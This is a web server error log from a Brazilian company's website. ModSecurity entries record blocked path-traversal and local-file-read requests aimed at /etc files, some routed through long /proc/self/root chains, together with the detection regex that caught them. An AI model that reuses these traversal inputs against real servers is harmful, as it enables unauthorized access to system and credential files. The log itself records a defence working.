[Fri Mar 20 09:25:30.827086 2026] [:error] [pid 11167:tid 140411607643904] [client 216.73.216.191:50922] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/profile.rpmnew"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/url =<width>x<height> \\"optional title\\""] [unique_id "ab08uvHIg5MgXLBnicMIjAAAAdA"]
[Fri Mar 20 09:25:31.485776 2026] [mime_magic:error] [pid 11642:tid 140411725141760] (70014)End of file found: [client 216.73.216.191:50968] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Fri Mar 20 09:25:33.829488 2026] [mime_magic:error] [pid 31215:tid 140411733534464] (70014)End of file found: [client 216.73.216.191:51152] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Fri Mar 20 09:25:40.311480 2026] [:error] [pid 31215:tid 140411616036608] [client 216.73.216.191:51480] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/exports"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/url =<width>x<height> \\"optional title\\""] [unique_id "ab08wwF0L0L-SsrnPo556wAAAs8"]
[Fri Mar 20 09:25:40.740378 2026] [mime_magic:error] [pid 7235:tid 140411624429312] (70014)End of file found: [client 216.73.216.191:51538] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Fri Mar 20 09:25:41.920373 2026] [:error] [pid 9818:tid 140411641214720] [client 74.7.243.128:42956] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/gcrypt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab08xV1pVZ5mVmJwsFNC1gAAAEw"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 09:25:47.066905 2026] [:error] [pid 10189:tid 140411548894976] [client 74.7.243.128:43566] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/systemd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab08xzJ3M9BSuKP7CAYwmAAAAJc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 09:25:49.559537 2026] [:error] [pid 26799:tid 140411616036608] [client 74.7.243.128:40010] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/lwcorp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab08zda6ubjKNq_cu4bpfwAAA08"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 09:25:53.779438 2026] [:error] [pid 7893:tid 140411540502272] [client 74.7.243.128:40012] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/tuned"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab080RCii7xarUs8iHZ5kwAAAhg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 09:26:07.789804 2026] [mime_magic:error] [pid 11167:tid 140411574073088] (70014)End of file found: [client 216.73.216.191:52986] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Fri Mar 20 09:26:08.882356 2026] [:error] [pid 11642:tid 140411624429312] [client 216.73.216.191:53068] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/grafana-agent.yaml"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/url =<width>x<height> \\"optional title\\""] [unique_id "ab084Lninkcc-iUj5Apv8QAAA44"]
[Fri Mar 20 09:26:19.628571 2026] [mime_magic:error] [pid 15826:tid 140411733534464] (70014)End of file found: [client 216.73.216.191:53606] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Fri Mar 20 09:26:48.855910 2026] [:error] [pid 21219:tid 140411666392832] [client 216.73.216.191:55298] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/bash_completion.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/'"] [unique_id "ab09CPXLqtnMIWvjpaKr-gAAAok"]
[Fri Mar 20 09:27:25.750992 2026] [:error] [pid 31215:tid 140411708356352] [client 216.73.216.191:57138] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/kernel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/url =<width>x<height> \\"optional title\\""] [unique_id "ab09LQF0L0L-SsrnPo56QwAAAsQ"]
[Fri Mar 20 09:27:30.496423 2026] [mime_magic:error] [pid 7893:tid 140411557287680] (70014)End of file found: [client 216.73.216.191:57428] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Fri Mar 20 09:27:31.856741 2026] [:error] [pid 21219:tid 140411649607424] [client 216.73.216.191:57518] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/sudo.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/'"] [unique_id "ab09M_XLqtnMIWvjpaKsGQAAAos"]
[Fri Mar 20 09:27:50.235668 2026] [:error] [pid 11642:tid 140411540502272] [client 216.73.216.191:58410] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/issue.net"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/'"] [unique_id "ab09Rrninkcc-iUj5ApwTAAAA5g"]
[Fri Mar 20 09:27:57.952246 2026] [:error] [pid 11167:tid 140411590858496] [client 216.73.216.191:58884] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/securetty"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/'"] [unique_id "ab09TfHIg5MgXLBnicMJZAAAAdI"]
[Fri Mar 20 09:28:06.863313 2026] [:error] [pid 9818:tid 140411624429312] [client 216.73.216.191:59354] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/vimrc"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/'"] [unique_id "ab09VV1pVZ5mVmJwsFNDaAAAAE4"]
[Fri Mar 20 09:28:12.907757 2026] [:error] [pid 11642:tid 140411641214720] [client 216.73.216.191:59756] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/wpa_supplicant"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/'"] [unique_id "ab09XLninkcc-iUj5ApwXgAAA4w"]
[Fri Mar 20 09:28:20.431819 2026] [:error] [pid 11642:tid 140411599251200] [client 216.73.216.191:60324] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/group"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/'"] [unique_id "ab09ZLninkcc-iUj5ApwbAAAA5E"]
[Fri Mar 20 09:28:27.511356 2026] [:error] [pid 9818:tid 140411548894976] [client 216.73.216.191:60760] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/rpc"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/'"] [unique_id "ab09a11pVZ5mVmJwsFNDigAAAFc"]
[Fri Mar 20 09:28:28.956931 2026] [:error] [pid 7893:tid 140411725141760] [client 216.73.216.191:60868] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/sysctl.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/'"] [unique_id "ab09bBCii7xarUs8iHZ6IwAAAgI"]
[Fri Mar 20 09:28:30.067294 2026] [mime_magic:error] [pid 11167:tid 140411683178240] (70014)End of file found: [client 216.73.216.191:60932] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Fri Mar 20 09:28:36.531517 2026] [:error] [pid 11642:tid 140411582465792] [client 216.73.216.191:33108] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/crypttab"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/'"] [unique_id "ab09dLninkcc-iUj5ApweQAAA5M"]
[Fri Mar 20 09:28:47.141862 2026] [:error] [pid 7235:tid 140411540502272] [client 74.7.228.61:44852] [client 74.7.228.61] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "ab09f_qxLDW4GITHUkT7_wAAARg"]
[Fri Mar 20 09:29:30.193817 2026] [mime_magic:error] [pid 31215:tid 140411624429312] (70014)End of file found: [client 74.7.241.31:44384] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php, referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/lib/systemd/system
[Fri Mar 20 09:30:07.943235 2026] [:error] [pid 26799:tid 140411574073088] [client 74.7.244.43:45414] [client 74.7.244.43] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "ab09z9a6ubjKNq_cu4bqvAAAA1Q"]
[Fri Mar 20 09:30:20.779229 2026] [:error] [pid 15826:tid 140411691570944] [client 74.7.241.31:34352] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/var/run/initramfs/state/etc/sysconfig"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab093OoXxyEfFpUF8f-T1gAAAUY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/var/run/initramfs/state/etc
[Fri Mar 20 09:30:23.143024 2026] [:error] [pid 7235:tid 140411741927168] [client 74.7.241.31:39466] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/run/initramfs/state/etc/sysconfig"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab093_qxLDW4GITHUkT8bgAAAQA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/run/initramfs/state/etc
[Fri Mar 20 09:31:02.134047 2026] [:error] [pid 21219:tid 140411674785536] [client 216.73.216.191:26302] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/etc/rsyslog.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0-BvXLqtnMIWvjpaKsoQAAAog"]
[Fri Mar 20 09:31:45.894763 2026] [:error] [pid 26799:tid 140411699963648] [client 74.7.241.31:39482] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/prelink.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0-MNa6ubjKNq_cu4br1AAAA0U"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 09:31:47.370129 2026] [:error] [pid 31215:tid 140411574073088] [client 74.7.241.31:59148] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/yum.repos.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0-MwF0L0L-SsrnPo57bwAAAtQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
